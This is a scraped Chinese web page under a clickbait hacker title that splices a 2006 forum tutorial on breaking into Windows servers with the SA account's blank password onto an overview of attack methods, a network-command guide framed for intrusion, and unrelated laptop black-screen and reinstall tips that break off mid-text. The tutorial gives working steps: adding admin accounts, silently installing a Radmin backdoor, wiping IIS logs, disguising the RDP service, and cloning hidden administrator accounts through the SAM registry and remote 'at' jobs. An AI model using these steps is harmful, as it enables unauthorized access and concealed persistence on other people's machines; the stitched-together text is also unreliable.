黑客克隆热门应用弹框不断弹_黑客克隆热门应用弹框不断弹出

文章目录：

• 1、入侵软件
• 2、解释解释入侵网站的原理
• 3、电脑黑屏怎么回事？
• 4、电脑中毒后怎样重装系统
• 5、手机号码被黑客知道会不会被克隆

入侵软件

SA空口令入侵到3389终结完整编(转)

SA空口令入侵到3389终结完整编

作者：fibwet 来源：原创 更新时间：2006-5-2 浏览次数：40

工具:WINNTAutoAttack自动攻击器(扫漏洞)

SQLTOOLS(SA空口令连接器)

RAMDIN影子3.0中文版(远程控制程序)

RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序)

CleanIISLog.exe(小榕的擦PP程序)

3389.exe(开3389端口服务的)

psu.exe(使用被禁止的Guest帐户要用到的)

mstsc.exe(远程桌面连接程序)

下载(点右键用下载工具下)

一.扫到SA弱口令..(自动攻击器)

二.用SQLTOOLS连上去建一个用户

net start telnet 开telnet服务

net user mint mint /add 添加用户mint密码为mint

net localgroup administrators mint /add 将帐号mint升级为管理员

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe(从新

2、在本地设置服务端（一定要生成）

设置密码--设置连接端口(默认4489)--生成

3、导出注册表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的键值为1.reg

4、编写一个批处理，并命名为u.bat

--------------------------------------------

@echo off

net stop r_server

--------------------------------------------

5、写第二个批处理，r.bat,内容为

--------------------------------------------

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@echo off

@Explorer.exe /uninstall /silence

@Explorer.exe /install /silence

@regedit /s 1.reg

@net start r_server

@del rad.exe

@del 1.reg

@del r.bat

@del u.bat

--------------------------------------------

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包

7、将Rad.rar制作成自解压文件.

选择Default.sfx的自释放模块--高级自释放选项

--常规

释放路径:%systemroot%\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

--摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

--确定--确定

生成完成

四.用RADMIN客服端连接....

上传文件到c:\WINNT(XP是windows):

port.bat(如果是在XP下..这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门

RADMIN进入TELNET

运行 c:\winnt\3389.exe

重启肉鸡

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题..

使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

telnet对方ip。发现需要NTLM 身份验证。

我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

修改cmd的快捷方式属性为允许其他身份登陆。

然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

telnet对方ip.直接可以登陆对方电脑了。

使用命令

c:\query user (查看对方目前终端登陆状况。)

运行命令

c:\logoff 1(踢出去一个管理者)

再用c:\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\winnt\log . 自己的IP .(擦PP)

c:\winnet\1.bat (删除覆盖查看当前在线用户文件)

作者： 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

2 SA空口令入侵到3389终结完整编

七.打SA空口令补丁

程序--Microsoft SQL Server--查询分析器(有放大镜的)

--Windowst身位验证登陆

复制一下代码:SELMIS

--------------------------------------------

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

--------------------------------------------

按F5(运行)

关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录)

八.改3389端口和服务名称

修改服务器端的端口设置 ，注册表有2个地方需要修改。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

第二个地方：

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

PortNumber值，默认是3389，选择10进制 修改成所希望的端口，比如1314

要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧)

导出3389服务的

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

的键值为mm.reg文件.

编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行)

再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)"

第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter)

保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止)

再在CMD下

CD c:\winnt\system32

copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件)

CD C:\winnt

sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写)

九.注消后(注消比直接关要好些)..用Radmin重启肉鸡..

十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号

1.使用psu.exe展开注册表到

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

用法：[psu -p regedit -i pid]

Pid 的值为在任务栏空白处点右键--任务管理器---进程中的winlogon.exe后面的数值就是PID数值

如:psu –p regedit –i 157

将Guest克成管理员权限

克成管理员权限的方法:

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值.

在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)

导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据) 然后删除Guest的配置

2.查看计算机管理中帐户列表 刷新这时候会出现错误[找不到帐户](跳过这步也行)

3.将Guest的配置(二个REG文件导进注册表)

4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]

net user Guest **** [修改密码]

net user Guest /active:yes

net user Guest /active:no[命令行下禁用Guest]

5.实验被禁止的帐户Guest是否可用.

6.用Guest登陆后删除自己建的帐号

net user mint /del

整个过程结束

最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵

整个过程全部结束..这机子就真正变成你的肉鸡了...

文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助)

作者： 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

3 SA空口令入侵到3389终结完整编

笑语☆嫣然的《终结3389》

mervin制作 《终结3389》补充版

孤狼望月 使用被禁用的帐户[Guest]登陆

(他还有个(隐藏帐号后门教程)也差不多)

碎片 Radmin服务端最新配置方法

最后送一个找固定IP肉鸡的方法:

菜菜鸟教程之－如何提高扫描到肉鸡的机会 BY：网络凡人

先找个有不正常端口的代理，代理我一般到网迷之家()拿的。就这个好了

218.58.88.15:45576 [山东省 青岛市](我的是教育网，扫描不到国外的机的，所以用国内的IP来

做试范），我把它扩充了整一个网段。由218.58.88.1－218.58.88.255你可以扩充成218.58.80.1－

218.58.90.255 .端口为了减少动画的大小，就扫描3389好了，。IP扩充多少就要看你

的网快还是慢。快的就扩充多点，慢的只扫描一个c段IP好了。看到没有，[218.58.88.8]:

发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的，记得，

我这里出不了国外，才扫描国内的机。你们扫描国外的机，不要扫描国内的机啊～

如果发生了什么事，公安会找你的哦。好了。扫描就说到这了。

、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口

点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。

9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。

对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。

1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。（例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。）

作者： 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

4 SA空口令入侵到3389终结完整编

2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51

c:\winnt\system32\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值：at \\13.50.97.238 12:55

c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\

/e 是regedit.exe的参数，在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\13.50.97.238\admin$\system32\hacker.reg

c:\hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg

7、查看肉鸡时间：net time \\13.50.97.238 然后用at命令将用户hacker$删除:

at \\13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \\13.50.97.238 /del 断开与肉鸡的连接。

net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务（没有开启的话，你也可以远程开启，因为你有超级用户的密码了）。

四、利用被禁用的帐户建立隐藏的超级用户：

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1．想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉；而在命令行下，我还没有想到好的办法，只能在命令行下用命令："net user 用户名"一个一个来查看用户是否被禁用。

2．在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆之后，被禁用的用户hacker就会自动被激活了）: CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。

作者： 125.90.34.* 2006-7-14 23:30 回复此发言

--------------------------------------------------------------------------------

5 SA空口令入侵到3389终结完整编

3．如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），当然你也可以将用户hacher换成其它的被禁用的用户。

4．这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户连接一下肉鸡看看是否能连上？用命令：net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

5．如果没有cmdshell怎么办？你可以我上面介绍的at命令来禁用用户hacker;命令格式：at \\肉鸡ip 时间 net user hacker /active:no

6．原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内"C"健还是原来的"C"键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。

五、注意的几点事项：

1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。

2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。

3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过，未在NT上测试。本方法仅供研究，请勿将本方法用于破坏上，利用本方法造成严重后果者，由使用者负责，本人概不负责

解释解释入侵网站的原理

一、获取口令

这种方式有三种方法：一是缺省的登录界面（ShellScripts）攻击法。在被攻击主机上启动一个可执行程序，该程序显示一个伪造的登录界面。当用户在这个伪装的界面上键入登录信息（用户名、密码等）后，程序将用户输入的信息传送到攻击者主机，然后关闭界面给出提示信息“系统故障”，要求用户重新登录。此后，才会出现真正的登录界面。二是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；三是在知道用户的账号后（如电子邮件“＠”前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；尤其对那些口令安全系数极低的用户，只要短短的一两分钟，甚至几十秒内就可以将其破解。

二、电子邮件攻击

这种方式一般是采用电子邮件炸弹（E－mailBomb），是黑客常用的一种攻击手段。指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的恶意邮件，也可称之为大容量的垃圾邮件。由于每个人的邮件信箱是有限的，当庞大的邮件垃圾到达信箱的时候，就会挤满信箱，把正常的邮件给冲掉。同时，因为它占用了大量的网络资源，常常导致网络塞车，使用户不能正常地工作，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪。

三、特洛伊木马攻击

“特洛伊木马程序”技术是黑客常用的攻击手段。它通过在你的电脑系统隐藏一个会在Windows启动时运行的程序，采用服务器／客户机的运行方式，从而达到在上网时控制你电脑的目的。黑客利用它窃取你的口令、浏览你的驱动器、修改你的文件、登录注册表等等，如流传极广的冰河木马，现在流行的很多病毒也都带有黑客性质，如影响面极广的“Nimda”、“求职信”和“红色代码”及“红色代码II”等。攻击者可以佯称自己为系统管理员（邮件地址和系统管理员完全相同），将这些东西通过电子邮件的方式发送给你。如某些单位的网络管理员会定期给用户免费发送防火墙升级程序，这些程序多为可执行程序，这就为黑客提供了可乘之机，很多用户稍不注意就可能在不知不觉中遗失重要信息。

四、诱入法

黑客编写一些看起来“合法”的程序，上传到一些FTP站点或是提供给某些个人主页，诱导用户下载。当一个用户下载软件时，黑客的软件一起下载到用户的机器上。该软件会跟踪用户的电脑操作，它静静地记录着用户输入的每个口令，然后把它们发送给黑客指定的Internet信箱。例如，有人发送给用户电子邮件，声称为“确定我们的用户需要”而进行调查。作为对填写表格的回报，允许用户免费使用多少小时。但是，该程序实际上却是搜集用户的口令，并把它们发送给某个远方的“黑客”。

五、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，Windows98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你不上网。还有就是有些程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用专门的扫描工具发现并利用这些后门，然后进入系统并发动攻击。

现在，你该知道黑客惯用的一些攻击手段了吧？当我们对黑客们的这些行为有所了解后，就能做到“知己知彼，百战不殆”，从而更有效地防患于未然，拒黑客于“机”外。网络的开放性决定了它的复杂性和多样性，随着技术的不断进步，各种各样高明的黑客还会不断诞生，同时，他们使用的手段也会越来越先进。我们惟有不断提高个人的安全意识，再加上必要的防护手段，斩断黑客的黑手。相信通过大家的努力，黑客们的舞台将会越来越小，个人用户可以高枕无忧地上网冲浪，还我们一片宁静的天空。

一，ping

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车，。所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。

（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）

至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了。

二，nbtstat

该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。

-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。

-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。

三，netstat

这是一个用来查看网络状态的命令，操作简便功能强大。

-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息，如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。

-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。

四，tracert

跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。

五，net

这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?回车如图6。

在这里，我们重点掌握几个入侵常用的子命令。

net view

使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。

net use

把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接（net use \\IP\IPC$ "password" /user:"name"），

建立了IPC$连接后，呵呵，就可以上传文件了：copy nc.exe \\192.168.0.7\admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。

net start

使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，如图9，成功启动了telnet服务。

net stop

入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。

net user

查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。

1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。

2，net user abcd /del，将用户名为abcd的用户删除。

3，net user abcd /active:no，将用户名为abcd的用户禁用。

4，net user abcd /active:yes，激活用户名为abcd的用户。

5，net user abcd，查看用户名为abcd的用户的情况

net localgroup

查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法：net localgroup groupname username /add。

现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，呵呵，你可以再使用net user abcd来查看他的状态，和图10进行比较就可以看出来。但这样太明显了，网管一看用户情况就能漏出破绽，所以这种方法只能对付菜鸟网管，但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员，这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。

net time

这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一步入侵打好基础。用法：net time \\IP。

六，at

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command \\computer。

表示在6点55分时，让名称为a-01的计算机开启telnet服务（这里net start telnet即为开启telnet服务的命令）。

七，ftp

大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。

首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入“help”来查看帮助（任何DOS命令都可以使用此方法查看其帮助)。

大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。

首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例介绍。

用户名和密码都是ftp，密码是不显示的。当提示**** logged in时，就说明登陆成功。这里因为是匿名登陆，所以用户显示为Anonymous。

接下来就要介绍具体命令的使用方法了。

dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。

cd 进入某个文件夹。

get 下载文件到本地机器。

put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么 利用就不多说了，大家就自由发挥去吧。

delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。

bye 退出当前连接。

quit 同上。

八，telnet

功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息。

然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。

当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。

到这里为止，网络DOS命令的介绍就告一段落了，这里介绍的目的只是给菜鸟网管一个印象，让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些，这里只是抛砖引玉，希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助，特别的熟练掌握了一些网络的DOS命令。

另外大家应该清楚，任何人要想进入系统，必须得有一个合法的用户名和密码（输入法漏洞差不多绝迹了吧），哪怕你拿到帐户的只有一个很小的权限，你也可以利用它来达到最后的目的。所以坚决消灭空口令，给自己的帐户加上一个强壮的密码，是最好的防御弱口令入侵的方法。

最后，由衷的说一句，培养良好的安全意识才是最重要的。

电脑黑屏怎么回事？

1、请尝试按 组合功能键 调高屏幕亮度， 开启/关闭切换显示，避免屏幕亮度过低或因已关闭屏幕而造成电脑黑屏不显示。

2、开机按 F2键，进入BIOS界面查看是否正常显示？

(1)若BIOS界面黑屏不显示，可能为电脑硬件问题，请携带机台至华硕服务中心进行检测。

(2)若BIOS界面显示正常，请尝试在BIOS界面按 F9 键恢复默认值，然后按F10保存退出，重启电脑；

若无效可能为系统或驱动软件问题引起，尝试备份数据资料后恢复或重装系统解决。

3、笔记本外接显示器，按组合键 切换显示；

（1)如果外接显示器正常显示，请卸载显卡驱动程序并重新安装；

并且确认近期是否有安装更新或其它程序软件？如有，请通过【控制面板】-【程序和功能】-卸载已安装的更新及近期安装的程序软件。

(2)如果外接显示器也不显示，或者您没有相关显示器设备进行测试，建议您将机台带到华硕服务中心检测确认。

4、请确认是否有加装过内存或其它硬件？如有，请取出移除加装的内存/其它硬件后再开机确认。

5. 请移除所有外接装置，包含USB/记忆卡/网络线/HDMI等

6.移除变压器，按压电源键40秒(按住不放开)

如您通过以上方式仍无法解决，请您携带机台至就近的华硕服务中心由工程师进行相关检测。

电脑中毒后怎样重装系统

你不是要详细的吗？咱们就来详细的

不行的话还有视频

要说起来太烦了，装系统，只要你看别人装过一边，自己就会了。还是给你看看别人打好了的吧。

关于如何安装,你可以看看下面的文章.

参考资料：

;cid=12

有教你装单系统，双系统等，有彩图.相信你会去学习装.我的电脑也是在这里装的

方法1:

首先，确定你的光驱是第一启动顺序并支持从光驱启动。

要从光盘安装，要把BIOS进行设置，使系统能够从光盘启动。其方法如下：

